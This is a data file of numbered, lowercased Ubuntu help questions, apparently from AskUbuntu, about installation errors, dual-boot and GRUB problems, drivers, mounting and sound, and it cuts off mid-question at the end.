383461	ca n't install python2.7 on ubuntu 13.04	i 'm trying to install python 2.7 on my ubuntu 13.04 vps . i 'm issuing ; sudo apt-get install python=2.7.4-0ubuntu1 and getting this in return reading package lists ... done building dependency tree reading state information ... done python is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 4 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up python2.7-minimal ( 2.7.4-2ubuntu3.2 ) ... # empty sitecustomize.py to avoid a dangling symlink could not find platform independent libraries < prefix > consider setting $ pythonhome to < prefix > [ : < exec_prefix > ] python2.7 : ca n't open file '/usr/lib/python2.7/py_compile.py ' : [ errno 2 ] no such file or directory dpkg : error processing python2.7-minimal ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of python-minimal : python-minimal depends on python2.7-minimal ( > = 2.7.4-1~ ) ; however : p ackage python2.7-minimal is not configured yet . dpkg : error processing python-minimal ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python2.7 : python2.7 depends on python2.7-minimal ( = 2.7.4-2ubuntu3.2 ) ; however : package python2.7-minimal is not configured yet . dpkg : error processing python2.7 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python : python depends on python2.7 ( > = 2.7.4-1~ ) ; however : package python2.7 is not configured yet . python depends on python-minimal ( = 2.7.4-0ubuntu1 ) ; however : package python-minimal is not configured yet . dpkg : error processing python ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : python2.7-minimal python-minimal python2.7 python e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 've been staring at this for ages and just ca n't see a way through . probably being a bit dim .
383462	unable to paste with xclip outside of terminal	i am trying to copy from the terminal with xclip and paste it into the unity desktop environment into gedit text editor . i can copy and paste with xclip in terminal : $ cat line-size.c | xclip xclip -o > input5.txt cat input5.txt # include < stdio.h > ... however , when i press control + v to paste into gedit , it only pastes the actual last thing i copied within unity desktop , such as something from firefox browser . how can i paste in gui applications something i copied from terminal ?
383465	ubuntu 13.10 grub2 triple boot , external drive	i have a samsung ativ book 8 with windows 8.1 and ubuntu 13.10 on the internal 1t drive . recently i acquired a 250g external usb hard drive . i booted the samsung from the same usb thumb drive that i had used to install ubuntu 13.10 on the internal drive but chose to install ubuntu 13.10 on the entire external usb 250g hard drive , but , and this is important , i set the device for the bootloader as /dev/sda5 which is the boot partition on the internal drive for the original ubuntu . now - with the external usb drive connected , i hit f10 and boot from the linux boot loader which brings up the grub2 menu and i can choose either of the two ubuntus ( the internal or the external ) and boot and all is well . but if i disconnect the external usb drive and hit f10 on boot up and select the linux boot loader , i do not get the grub2 menu , and can not choose to boot from the internal ubuntu . i get an error and it drops immediately into grub in a terminal . so , the problem is , if i do not have the external drive connected , i can not get to the grub2 menu and therefore can not boot to the internal ubuntu . any advice would be greately appreciated . ed update 12/3/2013 -- - well , i have not solved it yet , and i do not understand it yet but i have found a work-around . if i boot the samsung without the external drive connected , i get dropped into the grub cli . i can then issue the following commands and it will boot ubuntu from the internal drive . grub > linux ( hd0,5 ) /boot/vmlinuz-3.11.0-14-generic root=/dev/sda5 grub > initrd ( hd0,5 ) /boot/initrd.img-3.11.0-14-generic grub > boot i am just posting this in case it may somehow help someone else . i am sure when i have time to read more about groub2 ( which is great ) i will understand it and fix it correctly . thanks for reading ed
383466	create a custom launcher for eclipse	ca n't make my custom eclipse launcher work on 13.10 ( fresh install ) . see screenshot below : the custom eclipse launcher on panel does n't work . double click on eclipse.desktop from file manager works but adds a new launcher with grey `` ? '' icon . eclipse is managed by the new grey launcher , not mine . i ca n't just block and use the `` ? '' launcher because it opens eclipse directly while i need to run my command . i followed the following steps : 1 ) unzipped eclipse into /opt/eclipse ( repository is not an option ) . 2 ) created custom gtk theme in /opt/eclipse/gtkrc-2.0-eclipse 3 ) created /opt/eclipse/run.sh ( the content is in the picture ) 4 ) installed gnome-panel and created a new launcher with custom icon and run.sh command 5 ) opened the file manager , navigated to /usr/ ... /application and dragged-dropped eclipse.desktop onto panel hope it 's all clear . how can i make my custom launcher work as expected or , at least , make the grey one run my command ? edit : following the sushantp606 's instructions i got the launcher work , but the grey laucher still opens when i run eclipse . then ... i looked for eclipse launchers with locate .desktor | grep eclipse and found this : ~/.local/share/applications/eclipse.desktop /usr/share/app-install/desktop/eclipse-platform : eclipse.desktop i changed the icon in both with the right path and now the launcher with grey icon has the eclipse icon as expected . so dropped the one i 've created .
383469	how to automatically open multiple openvpn connection at once ?	i 'm using 3 openvpn and , not sure it 's relevant here , but also a tinc vpn . while the tinc is always connected , i constantly find myself switching from an openvpn to another through ubuntu 's interface ( top right networks icon > vpn connections ) . i 've read here that copying the config files in /etc/openvpn/ would make them all start with the service , but it does n't seem to work ( i 've been using symlinks instead of hard copies ) . anto @ /etc/openvpn $ ls -al total 4 lrwxrwxrwx 1 root root 50 nov 26 17:35 openvpn_a.conf - > /etc/networkmanager/system-connections/openvpn a lrwxrwxrwx 1 root root 50 nov 26 17:35 openvpn_b.conf - > /etc/networkmanager/system-connections/openvpn b lrwxrwxrwx 1 root root 50 nov 26 17:35 openvpn_c.conf - > /etc/networkmanager/system-connections/openvpn c -rwxr-xr-x 1 root root 1357 feb 13 2013 update-resolv-conf what can i do in order to debug and , possibly , solve that ?
383470	i ca n't install anything on my pc because of an error	reading package lists ... error ! e : read error - read ( 5 : input/output error ) e : the package lists or status file could not be parsed or opened . this is what i get when i try to install anything in terminal and the software center wo n't load . i installed windows xp pro so i could use itunes yesterday and it freezes , i dual booted ubuntu with xp and i ca n't install anything , i also ca n't use my sound card and i had to use the onboard sound card built into my motherboard .
383474	how to run a script on login	i want to get a script started on each login from domain users ... how to do it ? /etc/init.d/ is on startup not on login afaik .
383475	noise with my external microphone on ubuntu 12.04	i have bought an external microphone but i ca n't make it work without a vary bad noise . the microphone records but always with this noise in the background . i 've tried different combination for the values of capture in alsamixer but it does n't work . if i make it lower then the recorded file is lower as well . i tried making mic boost silent but nothing . 0 [ intel ] : hda-intel - hda intel hda intel at 0xd4200000 irq 46 this is my audio card if it helps .
383477	nothing working properly	i just installed ubuntu and have been getting errors in everything . music and video files are not running . software centre can not download a single software . what to do ?
383481	burning cd 's with brasero error	( sorry for my english ) so , my windows xp broke and i installed ubuntu 13.04 . i got back a windows xp iso and i 'm considering dual-booting . the problem is that when i try to burn the iso , i get an error : '' scsi error on write ( 640,16 ) : see mmc specs : sense key b `` command aborted '' , asc 00 ascq 00. '' . the full error log is here : http : //pastebin.com/ue69chqc edit : ok , so i installed k3b and bought a new dvd disk ( still dvd-r ) . no problem with the burning . the problem probably was in brasero . thank you for the help , really appreciate it .
383482	modem manager gui not showing traffic after upgrade to saucy salamander	upon upgrading to saucy salamander my modem manager gui stopped showing network traffic . i reinstalled modem manager gui . re-downloaded and reinstalled . same problem . i reinstalled modem manager . then the gui . same problem . i receive sms ' and the modem manager correctly identifies my modem ( vodafone ( zte ) k3772-z ) . all assistance gratefully appreciated . kind regards , peter
383488	ubuntu image on screen not completely filled in	i have a brand new dell windows 7 professional computer . i booted ubuntu 12.04 from the cd and got to the first window where it asks what language , the image was only partially viewable . black multiple bent and broken lines of varying thickness took up a significant portion of the screen . i felt like more data from cd needed to be loaded onto the computer but the computer was done reading the cd .
383493	can not open update manager	i am trying to install intel drivers on steam and when i try to open the update manager i get this message 'e : malformed line 6 in source list/etc/apt/sources.list ( dist parse ) ' i 'm also very new to linux considering i got ubuntu yesterday . any and all help is greatly appreciated . thanks .
383495	binary/usenet nzb download program	i 'm searching for a binary ( also known as usenet ) program similar to my windows program alt.binz . i really like alt.binz because it does everything for me from downloading , repairing , unrarring and deleting the .rars . i like this more than grabit or sabnzb . is there something similar to alt.binz for ubuntu ? if not , i would appreciate your best recommendations .
383496	live usb ubuntu server with persistent mode	im trying to put ubuntu server in a usb with persistent mode but its not working , is it possible to do or just with ubuntu-desktop ? thanks .
383497	wifi connection emachines d620	i 'm new to ubuntu and running 12.04lts on a e-machines d620 . everything is working properly except for wi-fi and wired connection . i can not have it connected to the internet with either of this options . can anyone help ?
383499	how to migrate gdm font setup ?	i have purged gdm and switched to lightdm . this changed how my fonts look in x applications . unfortunately , they did not get prettier . how can i have the same fonts in both or migrate settings from gdm to lightdm ?
383500	xubuntu 13.10 radeon hd mobility 4530 : slow flash performance	i 'm fairly new to linux in general , i do n't do much outside the basic usage with common support . i 'm trying to get a mildly old laptop to work with xubuntu 13.10 , it 's struggling along on windows 7 . problem is , my gpu ( amd radeon hd mobility 4530 ) does n't seem to have a lick of support on linux . i tried searching around for stuff , found something about fglrx not working with my model anymore , etc . i 'm mostly finding dead ends . i 'm not even looking to play too many games on here , i really just want flash player to work properly . so , what options are available to me to get flash player working better ? i 'm hoping to usee crunchyroll.com a fair bit , so youtube specific solutions are n't going to cut it . of course , if somebody could provide a crunchyroll specific solution , i suppose i 'd take that as well . here 's what sudo lshw -c video brought up , hope it can maybe help . pci ( sysfs ) *-display description : vga compatible controller product : rv710/m92 [ mobility radeon hd 4530/4570/545v ] vendor : advanced micro devices , inc. [ amd/ati ] physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:50 memory : c0000000-cfffffff ioport:7000 ( size=256 ) memory : da000000-da00ffff memory : da020000-da03ffff
383501	enable the keyboard backlights on supported lenovo ( e.g . carbon x1 ) with command	some lenovo laptops have keyboard backlights , and they can be turned on using fn + space . there are three states : off , normal and bright . when i start ubuntu , these laptops always default back to a burning sun screen brightness and the keyboard lights off . i want a medium brightness and keyboard lights on by default , because i usually use this laptop in dark environments . the backlight is easy . internet is filled with information about this . echo 10 > /sys/class/backlight/acpi_video0/brightness but how do i turn on the keyboard backlights with a command ? i 've been looking here but it seems to do nothing : /sys/class/leds/tpacpi\ : \ : thinklight updates i tried for i in { 1..32 } ; do xset led $ i ; done but nothing changes . perhaps the keyboard backlight for lenovo laptops has a proprietary driver and can only be controlled through tpacpi ? also tried for i in $ ( find /sys/devices/platform/thinkpad_acpi/leds/ | grep /brightness\ ) ; do echo 255 > $ i ; done of no avail .
383502	( re ) mount usb device	i just ca n't seem to figure out the exact mount-command to re-mount my phone . it used to automatically appear , but for some reason in stopped . i need help to get the mount-statement right . the device is listed in lsusb bus 001 device 002 : id 1058:1100 western digital technologies , inc . bus 001 device 003 : id 4971:1014 simpletech bus 002 device 003 : id 04e8:685c samsung electronics co. , ltd bus 006 device 002 : id 046d : c52b logitech , inc. unifying receiver and dmesg nicely tells about the device getting connected : [ 8469.512061 ] usb 2-2 : new high-speed usb device number 3 using ehci_hcd [ 8469.645304 ] usb 2-2 : new usb device found , idvendor=04e8 , idproduct=685c [ 8469.645310 ] usb 2-2 : new usb device strings : mfr=2 , product=3 , serialnumber=4 [ 8469.645315 ] usb 2-2 : product : galaxy nexus [ 8469.645318 ] usb 2-2 : manufacturer : samsung [ 8469.645321 ] usb 2-2 : serialnumber : 0146a5b31900d012 how do i glue this together to a working mount-command ?
383505	android galaxy s2 mtp dbus error	when i connect my galaxy s2 to my computer using usb , ubuntu displays the following error : dbus error org.freedesktop.dbus.error.unknownmethod : method '' queryinfo '' with signature `` aysus '' on interface `` org.gtk.vfs.mount '' does n't exist select another viewer and try again i have a passcode on my galaxy , but before i connect it to the computer i unlock it . up until now it worked fine
383506	firefox internet working on live usb but not working on installed ubuntu	firefox works in a live usb session , but when i installed ubuntu 13.10 , firefox was not working . i am confused what could be the reason . is there something related to drivers or something which which is missing on the installed version but is present in the ubuntu live session ?
383509	what is the role of the swap space ?	this has been something that i 've wanted to ask for quite a while , but i just have n't . when ubuntu is being installed there is an option where swap space can be assigned , at least in the custom partition option ( in the other options whether it is or is n't , i really do n't know ) . so what is the role of the swap space ? additionally , in the system monitor , there is an icon indicating the amount of swap that has been used . is it the same ?
383512	trying to remove ubuntu-desktop with tasksel returns `` aptitude failed ''	i am following this guide trying to turn my ubuntu-desktop-installation into ubuntu-server . however , i am having problems already in step 2 . using tasksel to remove/install anything returns with : tasksel : aptitude failed ( 100 ) i 've googled around and read this question ( it was the first thing i tried ) , but nothing suggested works . i am running 12.04 . afraid i do now have much more information than that . if anyone could point me in the direction of an error-log that i could look into i can supply with further info , but i have not found anything of interest in them yet .
383513	how to end x session ?	is there a generic way to orderly end x session regardless of display mangager or window manager ? more specifically , i use different windows managers for different users , and after reboot one user can not login back , because gdm says i am already logged in . i assume this is because i leave dirty state ( that user ends session with openbox -- exit ) .
383514	ubuntu postfix can not receive mail from gmail	on a vps with ubuntu 12.04 server i have install postfix with dovecot and i have create 3 email accounts . last 5 days the above email accounts can not receive any mail only from gmail . in gmail i receive the message : technical details of temporary failure : unspecified error ( sent_second_ehlo ) : connection reset by peer -- -- - original message -- -- - dkim-signature : v=1 ; a=rsa-sha256 ; c=relaxed/relaxed ; d=gmail.com ; s=20120113 ; h=mime-version : date : message-id : subject : from : to : content-type ; bh=bgggrao0qoverkix4bo5da9pxirwx4aqnblmgvcpan8= ; b=wawotmmyprjflxedbgihnmtfpydq0zqfkfsffnj4ryc8gbsdsalethyoxj+ojyli0k mpihwo0gllqoom53u22cmvjzfjuqpybfkhhkiyq3xocxymjiexmqs+pqkwxrzrv6duud ce0egtmeau/a0jwqr8thriy18bnrzjmbkq+vaml059anpbaskp2kk3czob37/tsshxgu rfpbzu3kpwa5lzykb0ubut/pfc/dlx6l/ypnb8osmpiyff67ct5fvnpdmqwbky457tvo iotyb+dsksf2sivwiyykb9cvkeih7z4lxsjwhnye2brm9cf5vfhbytmywgafvoktpejm s3wq== mime-version : 1.0 x-received : by 10.180.14.195 with smtp id r3mr10183957wic.51.1385580676182 ; wed , 27 nov 2013 11:31:16 -0800 ( pst ) received : by 10.194.143.72 with http ; wed , 27 nov 2013 11:31:16 -0800 ( pst ) date : wed , 27 nov 2013 21:31:16 +0200
383515	what 's the difference between lpr and cupswrapper drivers ? how to install printer drivers ?	i 'm considering getting a brother hl2230 printer . i ca n't find that printer listed in https : //www.openprinting.org/printers however there 're a few hl2230 linux drivers available in http : //welcome.solutions.brother.com/bsc/public_s/id/linux/en/download_prn.html # hl-2230 what 's the difference between lpr driver and cupswrapper driver ? which one should i use for ubuntu ? and once i download the driver how to i install it ? thanks
383518	things to keep in mind to change after cloning a ubuntu server vm	i have a ubuntu 12.04 server running on an vmware workstation 8 . due to my time limitations i can not afford to install new servers so i decided that i must make 10 clones of it with the exact same configuration . what must i keep in mind to change besides the ip address , mac address and the hostname so that i do n't cause any conflicts between the servers after that ?
383519	lubuntu ignores sleep mode prefrence	i may be posting in the wrong forums , since this is a lubuntu question . sorry , i 'm pretty new to this and i 'm desperate for an answer . anyway , i have a dell inspiron n4010 laptop running lubuntu 13.10 ( latest version ) . i needed to disable automatic sleep/hibernate , so i went into the power settings and disabled everything that had to do with that . it still goes into sleep mode after 5-10 minutes . i need to be able to disable it because i frequently download files and run sh scripts and go grab a coffee ( or two ) . help ? ! my specs are : cpu : intel core i3 370m dual core ( with hyper threading ) @ 2.40ghz on the first core and the second one is running @ 2.39ghz ram : 8gb crucial ddr3/1066 hdd : oh , some segate something : ) i do n't think it matters much graphics : intel hd graphics
383525	how do i fix corrupt background in lightdm ?	after a fresh installation of lubuntu 13.10 the default background image is distorted ( the provided image shows a part of it ) . all gui elements are displayed correctly . if i then select a different user in the drop-down list , like the guest session , the background is reloaded and displays correctly . does anyone know how to fix this problem ? i use a macmini 3,1 with an nvidia geforce 9400m graphics card and a 1280x1024 ( lcd ) monitor .
383528	dual booting ubuntu 13.10 x64 and windows 7 ultimate n x64 ?	i 'm having trouble installing alongside my win 7 ubuntu 13.10 . it 's not the first time i dual boot ubuntu and windows but this time , during the installation , when i get to where you'r supposed to pick the disk and partition where to install ubuntu it does n't show me the option for installing it alongside my windows 7 ultimate n x64 ( the n version is the stripped down version of windows ) and when i tried creating the partition myself and fix grub using boot-repair it just did not start anymore in any of the oss . can someone help me ? thanks ! ! ! edit : i think the problem might be that the `` new '' ( it 's acctually 1 year old , only that i did n't do dual boot on this one yet ) motherboard i installed uses uefi for booting windows . i 'll give a try with the guides regarding that .
383530	installing ubuntu 13.10 on acer s7 does n't detect operating system and then gives `` ? ? ? ? ? ? '' error	i 'm trying to install ubuntu 13.10 from a usb drive onto an acer s7 alongside an existing windows 8 partition . i 've set aside a 30gb partition for the ubuntu installation . when i run the installation , it does n't detect any existing operating system . i 've followed this guide to the letter - but on the last step of the 'install ubuntu ' part ( the actual installation ) , i get the following un-googleable error : in case the picture is n't clear enough - it 's an error prompt with the message `` ? ? ? ? ? ? '' . clicking on `` ok '' takes me back to the first page in the installation ( the one telling me that no operating system is detected ) . pressing 'continue ' is not an option because of the error prompt . is anyone familiar with this ? how can i fix this error and install ubuntu ?
383531	dell poweredge t110 ii video sluggish on ubuntu 12.4lts	i installed ubuntu desktop 12.4 lts on dell poweredge t110 ii and it works fine except very sluggish mouse movements and inability to use teamviewer . i feel there is an issue with the graphic cars drivers . how can i get that resolved . thanks in advance .
383536	installing scanner driver	how can i download a scanner driver for epson xp-310 printer on ubuntu 12.04 , the software disc supplied is not compatible and no linux version available ,
383537	what do i have to do in order to install windows 8 os via usb when i already have ubuntu 13.10 on my laptop ?	i recently installed ubuntu 13.10 ( the latest version ) onto my laptop from a usb . now , i want to completely erase ubuntu 13.10 and go back to windows 8 . is there anything special i have to do besides put a windows 8 iso onto a usb and boot it through bios ? do i have to reset anything in bios ? my computer is a asus g46v if that helps . i 'm not trying to make this hard on anyone lol i 'm just a beginner at installing new os 's . i was proud of myself for installing ubuntu though . works like a charm . i play league of legends ( a game on windows ) and i did n't like the fps ( frames per second ) ubuntu offered so that is the reason i want to switch back . last note : the usb i use is 4 gb . although , as you 'll probably know , i only have 3.7gb due to the conversion or whatever . thanks for all who help : )
383539	my ctrl+alt+ ( left , right , up , down ) is not working , moving between workplaces , anyone else have this problem ?	also my shift+ctrl+alt+ ( arrow keys ) does n't work . in system settings > keyboard > shortcuts > navigation ; it looks good , here are pictures also , it worked before , but one time i turned my laptop on and it just wouldnât work .
383542	usb boot device totally unable to be formatted	i 'm really upset by now , i 've been trying 2hours straight to format a stupid usb drive ( i 'm new to ubuntu and i dont know if i will last long at this rate ) basically this was the lubuntu boot usb key i tried to remove files with sudo rm i tried to format disk with disk utility i tried to format disk with gparted ( with unmounting beforehand ) nothing works . i cant delete a file . i cant move a file to the usb key . i cant do anything . this is really infuriating.. i dont know what to do ? here are some gparted errors while trying to format to fat32 after unmounting error fsyncing/closing/dev/sdb : input/output error input/output error during write on /dev/sdb when i try to remove by hand , it says `` read-only file ''
383543	recover orphaned raid 0 from silicon image controller with linux software raid ?	i had an old xp machine in raid0 , 2 x 120gb drives on a sil3112 controller . the drives are intact ( afaik ) but the motherboard or p4 is toast . id love to recover precious photos from the drive or dump its entire contents onto an external . i am beginning to understand that ubuntu might be able to rebuild the array on a modern system so i can recover data using the livecd . is this correct ? if so do i need a machine with existing raid ports/controllers etc or do i just need a board with regular sata connections . many thanks in advance for any assistance in this topic .
383544	how do i change my keyboard the language	i just installed ubuntu 13 . i need to change the keyboard language permanently . now i 'm using the command : sudo setxkbmap -layout 'es , es ' -model pc105 but when i restart my computer the change does not make effect anymore . somebody knows how to make the change permanent ? thanks a lot !
383549	using ubuntu desktop as upnp dmc ( digital media controler )	i 've just tested rygel , but as i understand , rygel is a server . what i am looking for , is to choose the music on my computer ( using rhythmbox for example ) and the file ( or the stream ? ) is send via upnp to a network player ( pioneer n-50 from my side ) . then the `` sound '' is played by the network player ( connected to a hi-fi system ) . this scheme is working fine with my android phone without any configuration . i can even chose the output of my phone player , or local , or network player . i d like to be able to do the same from my ubuntu desktop because the screen , the mousse ... it 's so comfortable . use desktop as dmc , network player as dmr . thanks a lot .
383551	fix partition or rescue data from it . i used ddrescue	i screwed up a partition containing a windows xp when i was re-sizing it . now i ca n't mount it . anyways i used ddrescue like this : sudo ddrescue -r 3 /dev/sda2 /media/minow/storage/rc /media/minow/storage/logfile and it gave me a huge file with the size of the partition . now i do n't know what to do with it . after doing that i also entered the command sudo ddrescue -r 3 /dev/sda2 /media/minow/storage/rc /media/minow/storage/logfile i do n't know what it does . now i have the huge file and the log file . i need either to fix the partition or just rescue my data from it and then i 'll install windows xp again . ... plz do n't make me do that : ' ( any help 's appreciated and thanks in advance . more info
383552	ca n't download something	i ca n't download wine . it is stuck halfway , and no other downloads will start . i am downloading it from the ubuntu software center .
383554	where is ssh-agent started ?	ssh-agent is running but it is not started in any of these files : lightdm-session profile bashrc i have a recollection of seeing the ssh-agent initialization shell routine somewhere on ubuntu , similar to the recommended routine for cygwin . perhaps i am mistaken . system : ubuntu 12.04.3
383557	running binding of isaac on 64-bit ?	this is a re-post of a question i 've put here to no avail . i 've been using ubuntu for quite a while now , but my knowledge is limited . please bear with me ! : ) this issue revolves around the recent removal of ia32-libs in ubuntu 13.10 , and the game binding of isaac which depends on it - i recently purchased the game as part of the humble bundle , excited that it is now available for linux . however i have been unable to run either the 64 or 32 bit versions on my ubuntu 13.10 64-bit system . i can not install the 64 bit version , as it depends on the ia32-libs package , which was removed in 13.10 . i am able to install the 32 bit version after installing all dependencies separately , but when starting the game i get the errors `` libssl3.so : can not open shared object file : no such file or directory '' , `` error : initialising plugin . '' and `` error : initialising projector '' . i presume these all come when the game tries to load libraries that are n't there . both of the above instances occur when trying to install the game via a .deb file . when i say `` installing all dependencies '' , i mean installing every package listed as a dependency in the info attached to the .deb file . has anybody got any ideas about this ?
383560	`` make [ 1 ] : arm-eabi-gcc : command not found '' when installing vmware tools	i 'm trying to install vmware tools , however when it runs the vmware-config-tools.pl i 'm getting the following : make [ 1 ] : arm-eabi-gcc : command not found i have in path variable : /root/android/omni/prebuilts/gcc/linux-x86/arm/arm-eabi-4.4.3/bin and i do n't know if that 's right , i got just that path with arm-eabi in my system . also , when i checked gcc* packages with apt-get install gcc* i got the following : the following packages have unmet dependencies : ant1.7-gcj : conflicts : ant-gcj ant1.7-optional-gcj : conflicts : ant-optional-gcj libdb5.1-java-gcj : depends : libdb5.1-java ( = 5.1.29-5ubuntu8 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . any ideas ?
383565	ca n't detect wifi	i 'm relatively new to ubuntu and just dual booted 12.04 lts with windows 8.1 i can connect to wifi with windows ; however , it does n't allow me to with ubuntu . it does n't detect any wireless networks even when manually entered . it does connect via direct connection by ethernet cable . any help would be awesome . thanks !
383566	is there a good ps2 emulator for ubuntu 13.10 ?	is there a good ps2 emulator for ubuntu 13.10.i want a stable ps2 emulator to play on ubuntu
383567	ubuntu 13.04 graphic glitch	i have an inspiron 6000 with a gallium 0.4 on ati rv370 graphics card . it continually flashes blocks of black across the top . i can not even open the dash . i checked the proprietary drivers under settings and did n't see any options for the graphics card . how can i fix this ?
383568	multiple page scan using scanimage	what command to use in the terminal to scan multiple pages ? i normally use scanimage > myimage.pnm for 1 page scanning .
383571	how to solve this message on start up âan error occured while mounting ext3â	i am a complete newbie to the linux world . i was trying to install 11g express . i think i did something wrong . do n't know what . now it is showing an error occurred while mounting ext3 can you please help me ? i ca n't even find my fstab . please help me . i think i have these same problem like keep getting this message on start up `` an error occured while mounting ext3 '' but i am too new to linux to even understand these commands these are the results of sudo fdisk -l and sudo mount bashima @ bashima-h61m-s2p-b3 : ~ $ sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x000c1b9e device boot start end blocks id system /dev/sda1 * 2048 968417279 484207616 83 linux /dev/sda2 968419326 976771071 4175873 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 968419328 976771071 4175872 82 linux swap / solaris bashima @ bashima-h61m-s2p-b3 : ~ $ sudo mount /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) gvfs-fuse-daemon on /home/bashima/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=bashima )
383575	accidentally departitioned in ubuntu installation - now boot manager does n't work	ok , i 've spectacularly failed at the ubuntu installation process , and my new computer is now unusable . i realize that this is somewhat of a specialized case , but i 'd really be extradinarily grateful for any help that can be provided . i will try to supply all the relevant details : basically , i started off wanting to install ubuntu 13.10 alongside windows 8 . i set up a 30gb partition for the installation . i got an apparently common issue where the setup did not recognize windows 8 . i have been running the ubuntu installation off of a usb drive . in my attempts to install ubuntu ( which began with a `` ? ? ? ? ? ? '' error that i asked about on this site , and then once i was able to bypass that i got an errno 5 error ) , i had to launch and relaunch the installer several times . each time i did so , i had to go to the following screen and manually set aside the 30gb partition . now , after i got the `` ? ? ? ? ? ? '' error for the umpteenth time , i noticed that it took me back to the screen shown in image 1 , but this time the operating system was detected , and that it was ubuntu , and that the first option was to reinstall ubuntu . figuring that this was referring to the 30gb partition , i chose this option . i got the errno 5 error again , meaning that no actual installation took place . but when i launched the installer again , i got the following screen : image 1 : the faulty partitioning previously , there had been a ~217gb partition , the partition containing my windows 8 , and the 30gb partition that i had been playing around with . but now it 's the same partition . previously , when i launched ubuntu from the usb , and then restarted my computer , the boot manager would show windows 8 as the only boot option . now , there are no boot options . i can still run ubuntu by plugging in my usb . image 2 : boot manager does n't show windows . do i have any option of re-partitioning the 247gb so that i get my windows 8 back ? or do i have no other choice but reinstalling windows 8 ?
383577	after locking the screen and loging in	i am using ubuntu with two monitors ( an external bigger one and the other one is the notebook 's monitor ) . when i go to the lock screen and log in back to the system , the windows that were opened in the bigger monitor always get moved to the smaller monitor , so everytime i have to move the windows back to the bigger one . is there a way to keep the windows opened in the bigger ( external ) monitor instead ? thanks in advance for your help .
383580	windows7 ubuntu 12.04 dual-boot	i have a lenovo t430 laptop which comes with windows 7 pre-installed . i installed ubuntu 12.04 on the top of it . after installing ubuntu , windows7 does not boot any more . here is the boot-repair summary : http : //paste.ubuntu.com/6484094/ windows boot manager does boot . below is the error message : windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . 2 . choose your language settings , and then click `` next . '' 3 . click `` repair your computer . '' if you do n't have this disc , contact your system administrator or computer manufacturer for assistance . file : \boot\bcd status : 0xc0000225 info : an error occurred while attempting to read the boot configuration data . i am not sure if it 's because \boot\bcd can not be read by boot manager . this file /boot/bcd does exist , after i mount windows system-reserve partition ( /dev/sda1 ) and checked it . please help . thanks .
383581	install glassfish 4 on amazon ec2 ubuntu instance	i have a ec2 instance on aws running ubuntu 13.10 and i need to install glassfish 4 on it . i have found several tutorials on how to install glassfish 3.x on it , including this one and i tried to just do that tutorial substituting in glassfish 4 where appropriate , however , when i get to /etc/init.d/glassfish start i get a command not found error . what else do i need to do other than just substitute glassfish_v3/glassfishv3 with glassfish4 ? or , does anyone have a tutorial that is specific for glassfish4 on ec2 ?
383586	how to install latest release ubuntu without losing data files	i 'm running 12.04 and want to upgrade to the latest stable version . how do i do that without losing my data files ?
383593	video drivers reinstall	i was trying to fix steam , as it was showing nothing but white in the client . i updated all the video drivers , and after i did that steam refused to even load up , so i removed / uninstalled all my video drivers , now when i turn on my computer , it gets stuck at the `` low graphics '' warning pop-up . how do i reinstall the video drives so ubuntu will work again ?
383597	ubuntu 13.10 sound changing randomly	i recently upgraded to 13.10 and my sound will randomly adjust itself . its only within a few clicks of what it normally is . so if i had my volume at 50 % it will jump around to +- 50 % so between 30 % and 70 % . it will also mute my sound if mute is within that range . normally it wouldnât bother me but if iâm watching a movie or listening to music at a lower volume its annoying to have it mute out of nowhere then spike to being louder than i wanted it . there are other articles about this issue but no one seems to know the answer .
383598	how do i show missing icons in the system tray ?	i have two programs ; retroshare and cameramonitor ( which are both great programs ) that will not show in the system tray . it 's frustrating .
383599	how do i install this src.tar.gz file ?	i have heard that installing or running .tar.gz files is possible . this is a source code , also and if there is a difference i should be told about it . the game is http : //www.knightsgame.org.uk/files/knights_022_src.tar.gz . success would be great . this is a good game , it would be appreciated . ; ) followed mikewhatever 's directions below but ran into : reading package lists ... done building dependency tree reading state information ... done note , selecting 'libsdl1.2-dev ' instead of 'libsdl-dev' note , selecting 'libfontconfig1-dev ' instead of 'libfontconfig-dev' build-essential is already the newest version . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libcurl4-gnutls-dev : depends : libcurl3-gnutls ( = 7.22.0-3ubuntu4.2 ) but 7.22.0-3ubuntu4.3 is to be installed depends : libgnutls-dev but it is not going to be installed depends : libldap2-dev but it is not going to be installed depends : librtmp-dev but it is not going to be installed libfontconfig1-dev : depends : libfontconfig1 ( = 2.8.0-3ubuntu9 ) but 2.8.0-3ubuntu9.1 is to be installed libsdl1.2-dev : depends : libx11-dev but it is not going to be installed depends : libglu1-mesa-dev but it is not going to be installed depends : libpulse-dev but it is not going to be installed depends : libxt-dev but it is not going to be installed depends : libxext-dev but it is 